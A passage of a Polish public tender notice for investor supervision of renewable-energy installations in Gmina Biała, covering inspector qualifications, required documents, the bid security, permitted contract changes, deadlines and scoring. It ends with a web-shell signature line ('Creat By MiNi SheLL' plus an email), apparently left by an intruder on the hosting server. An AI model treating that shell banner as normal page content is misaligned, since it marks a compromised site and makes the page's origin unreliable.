uczestniczyła jako projektant w branży sanitarnej <br/>w opracowaniu lub sprawdzaniu co najmniej dwóch projektów budowlanych lub PFU, w zakres których wchodziło wykonanie instalacji powietrznych pomp ciepła do CO i CWU lub instalacji kotłów na pellet lub instalacji kolektorów słonecznych,<br/>b)	min. jedną osobą (która będzie pełniła funkcję osoby weryfikującej dokumentację projektową) posiadającą:<br/>	uprawnienia do projektowania w specjalności instalacyjnej <br/>w zakresie instalacji i urządzeń elektrycznych, których zakres uprawnia ją do projektowania robót objętych przedmiotem zamówienia,<br/>	doświadczenie (w ciągu ostatnich 5 lat przed terminem składania ofert) uczestniczyła jako projektant w branży elektrycznej <br/>w opracowaniu lub sprawdzaniu co najmniej dwóch projektów budowlanych lub PFU, w zakres których wchodziło wykonanie instalacji fotowoltaicznych lub magazynów energii,<br/>c)	min. jedną osobą (która będzie pełniła funkcję osoby weryfikującej dokumentację projektową) posiadającą:<br/>	uprawnienia do projektowania w specjalności konstrukcyjno-budowlanej, których zakres uprawnia ją do projektowania robót objętych przedmiotem zamówienia,<br/>	doświadczenie (w ciągu ostatnich 5 lat przed terminem składania ofert) uczestniczyła jako projektant w branży konstrukcyjnej <br/>w opracowaniu lub sprawdzaniu co najmniej dwóch projektów budowlanych lub PFU, w zakres których wchodziło wykonanie instalacji fotowoltaicznych lub magazynów energii lub pomp ciepła do CO i CWU lub kotłów na pellet lub kolektorów słonecznych,<br/>d)	min. jedną osobą (która będzie pełniła funkcję Inspektora nadzoru inwestorskiego w branży sanitarnej) posiadającą:<br/>	uprawnienia do kierowania robotami budowlanymi <br/>w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, których zakres uprawnia ją do kierowania robotami objętymi przedmiotem zamówienia, <br/>	doświadczenie (w ciągu ostatnich 5 lat przed terminem składania ofert) pełniła funkcję Inspektora nadzoru inwestorskiego przy realizacji co najmniej dwóch zamówień, z których każde obejmowało nadzór inwestorski nad wykonaniem instalacji pomp ciepła do CO i CWU lub instalacji kotłów na pellet lub instalacji kolektorów słonecznych,<br/>e)	min. jedną osobą (która będzie pełniła funkcję inspektora nadzoru inwestorskiego w branży elektrycznej) posiadającą:<br/>	uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia, <br/>	doświadczenie (w ciągu ostatnich 5 lat przed terminem składania ofert) pełniła funkcję Inspektora nadzoru inwestorskiego przy realizacji co najmniej dwóch zamówień, z których każde obejmowało nadzór inwestorski nad wykonaniem instalacji fotowoltaicznych lub magazynów energii,<br/>f)	min. jedną osobą (która będzie pełniła funkcję inspektora nadzoru inwestorskiego w branży konstrukcyjno-budowlanej) posiadającą:<br/>	uprawnienia do kierowania robotami budowlanymi <br/>w specjalności konstrukcyjno-budowlanej, których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia, <br/>	doświadczenie (w ciągu ostatnich 5 lat przed terminem składania ofert) pełniła funkcję Inspektora nadzoru inwestorskiego przy realizacji co najmniej dwóch zamówień, z których każde obejmowało nadzór inwestorski nad wykonaniem instalacji fotowoltaicznych lub magazynów energii lub pomp ciepła do CO i CWU lub instalacji kotłów na pellet lub instalacji kolektorów słonecznych.<br/><br/>DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW <br/>UDZIAŁU W POSTĘPOWANIU:<br/><br/>1)	Wykonawca powinien w wykazie usług wyraźnie określić zakres usług, aby można było ustalić, czy spełnia warunek udziału w postępowaniu.<br/>2)	Zgodnie z orzeczeniem TSUE C-387/14 (ESAPROJEKT) /odpowiedź na pytanie czwarte/ Zamawiający wskazuje, że w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub w przypadku korzystania z podmiotów udostępniających zasoby na podstawie art. 118 ustawy Pzp Wykonawca lub minimum jeden Wykonawca wspólnie ubiegający się o zamówienie lub minimum jeden podmiot udostępniający zasoby musi posiadać pełne doświadczenie wskazane w warunku udziału w postępowaniu wskazane w pkt. 6.1.4, ppkt. 1) SWZ - dotyczy to konieczności wykazania doświadczenia wynikającego z powtarzalności wykonanych usług tj. wykonania minimum 2 usług przez jeden podmiot.<br/>3)	Zamawiający przyjmuje, że warunek zostanie wykazany, jeżeli Wykonawca wykaże w wymaganym okresie 5 lat przed terminem składania ofert należyte wykonanie funkcji nadzoru inwestorskiego do momentu odbioru montażu lub momentu równoważnego (np. ustalenia wzajemnych rozliczeń z Wykonawcą w przypadku braku odbioru prac) bez uwzględnienia okresu gwarancyjnego lub okresu rękojmi – jeżeli usługa nadzoru obejmuje także te okresy.<br/>4)	Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. 2025 r, poz. 418) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania oraz zgodnie z treścią decyzji o ich nadaniu.<br/>5)	Wykonawca w celu wykazania spełniania warunków określonych w pkt 6.1.4, ppkt 2) SWZ może wskazać osobę będącą obywatelem państwa członkowskiego w rozumieniu art. 4a ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t. j. Dz. U. z 2023 r. poz. 551), która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznaczne wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2023 r., poz. 334) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551).<br/>6)	Zamawiający dopuszcza wykazanie tej samej osoby posiadającej określone w pkt. 6.1.4. ppkt. 2) SWZ wymagania do pełnienia więcej niż jednej ze wskazanych funkcji. <br/>7)	Poprzez pojęcie „Inspektora nadzoru inwestorskiego” Zamawiający rozumie realizację usługi, która obejmowała wykonywanie czynności nadzoru inwestorskiego w rozumieniu przepisów art. 25 ustawy Prawo budowlane,<br/>8)	„Projekt budowlany” - projekt niezbędny w rozumieniu ustawy Prawo budowlane (t. j. Dz. U. z 2025 r. poz. 418) do uzyskania pozwolenia na budowę lub zgłoszenia robót,<br/>9)	„PFU” – Program Funkcjonalno-Użytkowy,<br/>10)	„OZE” – odnawialne źródła energii.<br/><br/>2.	Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art. 116 ust. 2 ustawy Pzp).<br/>3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na zdolnościach tych <br/>z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności <br/>są wymagane.<br/>4.	Sposób wykazania warunków udziału w postępowaniu wskazano w rozdziale <br/>8 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.<br/><br/>Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (t. j. Dz. U. 2025 r., poz. 514).<br/>Wykluczenie, o którym mowa następuje na okres trwania ww. okoliczności.<br/>W przypadku wykonawcy wykluczonego na podstawie przesłanek wskazanych w pkt 7.6, zamawiający odrzuca ofertę takiego<br/>wykonawcy<br/>Osoba lub podmiot podlegające wykluczeniu , które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego<br/>lub biorą udział w postępowaniu o udzielenie zamówienia publicznego, podlegają karze pieniężnej. Karę pieniężną, nakłada Prezes<br/>Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3.1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/><br/>a)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane - zgodnie z wzorem stanowiącym Załącznik nr 6 do SWZ oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy,<br/>b)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z wzorem stanowiącym Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na potrzeby oceny ofert oferta musi zawierać:<br/>1)	Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach) wraz z załącznikiem do Formularz ofertowego (stanowiącym integralną część treści oferty) zawierającym informacje niezbędne do przyznania punktów w kryterium oceny ofert „Doświadczenie Inspektora Nadzoru”.<br/>2)	Oświadczenie wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia składane na podstawie art. 125 ust. 1 ustawy Pzp, o którym mowa w pkt 8.1 SWZ;<br/>3)	Oświadczenie, o których mowa w pkt 8.2 SWZ (jeżeli dotyczy);<br/>4)	Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy).<br/>5)	Oświadczenie podmiotu udostępniającego zasoby składane na podstawie art. 125 ust. 1 ustawy Pzp, o którym mowa w pkt. 9.8 SWZ (jeżeli dotyczy),<br/>6)	Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby:<br/>a)	Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji I Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b)	Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>c)	jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. <br/>7)	Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany wnieść wadium w wysokości: 4 000,00 PLN (słownie zł: cztery tysiące złotych i 00/100).<br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:<br/>Bank Spółdzielczy Ziemi Wieluńskiej<br/>Nr: 45 9244 0003 0000 0039 2000 0050<br/>z adnotacją: „Wadium - Numer referencyjny: GO.271.2.7.2025 - Pełnienie nadzoru inwestorskiego nad zadaniem inwestycyjnym pn.: „Montaż urządzeń OZE na terenie Gminy Biała - etap II”.<br/>4.	Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert.<br/>6.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a)	nazwę: dającego zlecenie (wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b)	kwotę wadium,<br/>c)	termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”,<br/>d)	zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji/poręczeniu na pierwsze żądanie zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.<br/>7.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>8.	Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	Oświadczenie, o którym mowa w pkt. 8.1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b)	w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt. <br/>c)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>10.3.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Oprócz przypadków, o których mowa w art. 454 i 455 ustawy Prawo zamówień publicznych i innych przypadków wskazanych w niniejszej umowie, Zamawiający dopuszcza możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku:<br/>1)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy (zmiana umowy dotyczyć będzie zakresu umowy wymagającego zmiany w celu dostosowania do nowych przepisów i ich skutków);<br/>2)	zmiany umów zawartych pomiędzy Zamawiającym, a inną niż Wykonawca podmiotem, w tym Wykonawcą dostaw z montażem instalacji OZE objętych nadzorem w zakresie mającym bezpośredni wpływ na realizację przedmiotu niniejszej umowy (zmiana dotyczyć może terminu wykonania zamówienia i zakresu świadczenia Wykonawcy oraz Zamawiającego);<br/>3)	zmiany umów zawartych pomiędzy Zamawiającym, a inną niż Wykonawca podmiotem, w tym Instytucją Zarządzającą, w szczególności zmiany postanowień umowy o dofinansowanie projektu w zakresie mającym bezpośredni wpływ na realizację przedmiotu umowy (zmiana umowy dotyczyć będzie zakresu umowy wymagającego zmiany w celu dostosowania do nowych postanowień umowy o dofinansowanie projektu i ich skutków);<br/>4) wystąpienia okoliczności, które w chwili podpisania umowy nie mogły być przez Strony przewidziane i zostały spowodowane przez okoliczności od nich niezależne w szczególności zmiany ilości, mocy i miejsca montażu poszczególnych instalacji OZE wynikające ze zmiany decyzji uczestników projektu lub z uwarunkowań technicznych (zmiany dotyczyć mogą terminu wykonania zamówienia i zakresu świadczenia Wykonawcy oraz Zamawiającego);<br/>5)	wystąpienia okoliczności niezależnych od Wykonawcy a wynikających ze zmian umowy z Wykonawcą montażu w szczególności dotyczących harmonogramu rozliczeń i wykonywania poszczególnych czynności (zmiana umowy dotyczyć będzie zakresu umowy wymagającego zmiany w celu dostosowania do nowych postanowień umowy o roboty budowlane i ich skutków)<br/>2.	Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej <br/>i podpisania przez obydwie strony umowy.<br/>3.	Z wnioskiem o zmianę umowy może wystąpić zarówno Wykonawca, jak <br/>i Zamawiający.<br/>4.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem wskazanym w pkt. 1.2 SWZ</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> C.D. pkt 4.3.1<br/><br/>Zamawiający przyzna punkty wg wskazanych poniżej zasad oceny tylko <br/>za doświadczenie, które w sposób całkowity spełni niżej wskazane wymogi. <br/>Punkty będą przyznawane wg zasad:<br/>„Doświadczenie Inspektora nadzoru inwestorskiego <br/>w branży sanitarnej (DIN1)”	Liczba punktów<br/>Wykonawca otrzyma 0 pkt, jeżeli osoba wskazana w ofercie jako Inspektor nadzoru inwestorskiego w branży sanitarnej w ciągu ostatnich 5 lat przed terminem składania ofert pełniła funkcję inspektora nadzoru inwestorskiego przy realizacji minimum dwóch zamówień, z których każde obejmowało nadzór inwestorski nad wykonaniem instalacji pomp ciepła do CO i CWU lub instalacji kotłów na pellet lub instalacji kolektorów słonecznych,	0 pkt<br/>Wykonawca otrzyma 10 pkt, jeżeli osoba wskazana w ofercie jako Inspektor nadzoru inwestorskiego w branży sanitarnej w ciągu ostatnich 5 lat przed terminem składania ofert pełniła funkcję inspektora nadzoru inwestorskiego przy realizacji minimum trzech zamówień, z których każde obejmowało nadzór inwestorski nad wykonaniem instalacji pomp ciepła do CO i CWU lub instalacji kotłów na pellet lub instalacji kolektorów słonecznych,	10 pkt<br/>Wykonawca otrzyma 20 pkt, jeżeli osoba wskazana w ofercie jako Inspektor nadzoru inwestorskiego w branży sanitarnej w ciągu ostatnich 5 lat przed terminem składania ofert pełniła funkcję inspektora nadzoru inwestorskiego przy realizacji minimum czterech zamówień, z których każde obejmowało nadzór inwestorski nad wykonaniem instalacji pomp ciepła do CO i CWU lub instalacji kotłów na pellet lub instalacji kolektorów słonecznych,	<br/>20 pkt<br/>„Doświadczenie Inspektora nadzoru inwestorskiego <br/>w branży elektrycznej (DIN2)”	Liczba punktów<br/>Wykonawca otrzyma 0 pkt, jeżeli osoba wskazana w ofercie jako Inspektor nadzoru inwestorskiego w branży elektrycznej w ciągu ostatnich 5 lat przed terminem składania ofert pełniła funkcję inspektora nadzoru inwestorskiego przy realizacji minimum dwóch zamówień, z których każde obejmowało nadzór inwestorski nad wykonaniem instalacji fotowoltaicznych lub magazynów energii,	<br/>0 pkt<br/>Wykonawca otrzyma 10 pkt, jeżeli osoba wskazana w ofercie jako Inspektor nadzoru inwestorskiego w branży elektrycznej w ciągu ostatnich 5 lat przed terminem składania ofert pełniła funkcję inspektora nadzoru inwestorskiego przy realizacji minimum trzech zamówień, z których każde obejmowało nadzór inwestorski nad wykonaniem instalacji fotowoltaicznych lub magazynów energii,	10 pkt<br/>Wykonawca otrzyma 20 pkt, jeżeli osoba wskazana w ofercie jako Inspektor nadzoru inwestorskiego w branży elektrycznej w ciągu ostatnich 5 lat przed terminem składania ofert pełniła funkcję inspektora nadzoru inwestorskiego przy realizacji minimum czterech zamówień, z których każde obejmowało nadzór inwestorski nad wykonaniem instalacji fotowoltaicznych lub magazynów energii.	20 pkt<br/><br/>W kryterium Doświadczenia Inspektorów Nadzoru (DIN) Zamawiający przyzna punkty wg wzoru: DIN= DIN 1 + DIN2 <br/>2.	Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów (O) stanowiących sumę przyznanych w ramach każdego <br/>z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/><br/>O = C + DIN <br/>gdzie: <br/>O- łączna liczba punktów oferty ocenianej, <br/>C- liczba punktów uzyskanych w kryterium „Cena brutto”,<br/>DIN - liczba punktów uzyskanych w kryterium „Doświadczenie Inspektorów Nadzoru”.<br/><br/><br/>C.D. Rozdział 5 - SWZ<br/>TERMIN WYKONANIA ZAMÓWIENIA:<br/>5.1.	Wykonawca wykonuje usługi w dwóch etapach:<br/>1)	etap wykonywania usługi nadzoru w okresie realizacyjnym tj. do momentu odbioru końcowego wykonanych instalacji OZE;<br/>2)	etap wykonywania usługi nadzoru w okresie gwarancyjnym jednak nie dłużej niż do 60 miesięcy od daty odbioru końcowego wykonanych instalacji OZE. <br/>5.2.	Termin zakończenia wykonywania dostaw z montażem instalacji OZE <br/>(etap realizacyjny) to 10 miesięcy od dnia zawarcia umowy z ich wykonawcą.

Creat By MiNi SheLL
Email: jattceo@gmail.com